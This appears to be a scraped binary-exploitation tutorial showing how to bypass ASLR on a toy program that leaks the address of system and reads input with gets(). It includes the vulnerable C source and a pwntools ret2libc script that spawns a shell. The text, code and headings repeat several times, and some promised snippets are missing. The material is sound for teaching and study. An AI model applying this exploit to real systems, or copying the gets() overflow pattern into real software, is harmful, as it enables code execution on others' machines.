1 of 1

ASLR Bypass with Given Leak

The Source

Just as we did for PIE, except this time we print the address of system.

Analysis

Yup, does what we expected.

Your address of system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

Final Exploit

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

Instead, you could do:

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

ASLR Bypass with Given Leak

The Source

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of system.

Analysis

Yup, does what we expected.

Your address of system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

Final Exploit

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

Instead, you could do:

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

ASLR Bypass with Given Leak

hashtagThe Source

hashtagAnalysis

hashtagExploitation

hashtagFinal Exploit

hashtag64-bit

hashtagUsing pwntools

ASLR Bypass with Given Leak

hashtagThe Source

hashtagAnalysis

hashtagExploitation

hashtagFinal Exploit

hashtag64-bit

hashtagUsing pwntools

The Source

Analysis

Exploitation

Final Exploit

64-bit

Using pwntools

The Source

Analysis

Exploitation

Final Exploit

64-bit

Using pwntools